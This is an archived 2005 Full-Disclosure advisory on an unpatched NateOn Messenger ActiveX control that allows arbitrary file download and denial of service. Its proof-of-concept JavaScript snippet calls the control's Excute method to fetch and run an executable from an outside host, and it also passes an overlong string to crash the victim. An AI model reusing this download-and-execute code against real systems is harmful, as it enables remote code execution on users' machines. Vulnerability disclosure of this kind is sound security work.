[Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn Messagener's ActiveX and DoS

• Previous message: Moritz Naumann: "[Full-disclosure] SquirrelMail Address Add Plugin XSS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <bugtraq@securityfocus.com>, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.grok.org.uk>
Date: Thu, 29 Sep 2005 11:36:27 +0800

Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS

Discoverer: PARK, GYU TAE (saintlinu@null2root.org)

Advisory No.: NRVA05-08

Critical: Moderately Critical

Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS

Where: From remote

Operating System: Windows Only

Solution: unpatch yet

Workaround: N / A

Notice: 09. 17. 2005 Initiate notified

                   09. 23. 2005 2nd notified

                   09. 27. 2005 3rd notified

                   09. 29. 2005 Vendor didn't response. Disclosure
vulnerability

Description:

The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on

If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX

and there is another vulnerability like Buffer Overflow

See following detail describe:

NOT INCLUDED HERE BUT A PIECE OF CODE

<--snip-->

             i = GotNate.IsNateonInstall();

             if( i == 1 ) {

                           alert('NateOn Messenger already installed. Do
Attack ...');

                           // if you want to second order attack then try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');

                           // if you want to crash to victim system the try

                           i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');

             } else {

                           alert('NateOn Messenger NOT Installed');

             }

</--snip-->

        
                
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr)
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com)
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

        
                
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr)
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com)
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)

• Previous message: Moritz Naumann: "[Full-disclosure] SquirrelMail Address Add Plugin XSS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]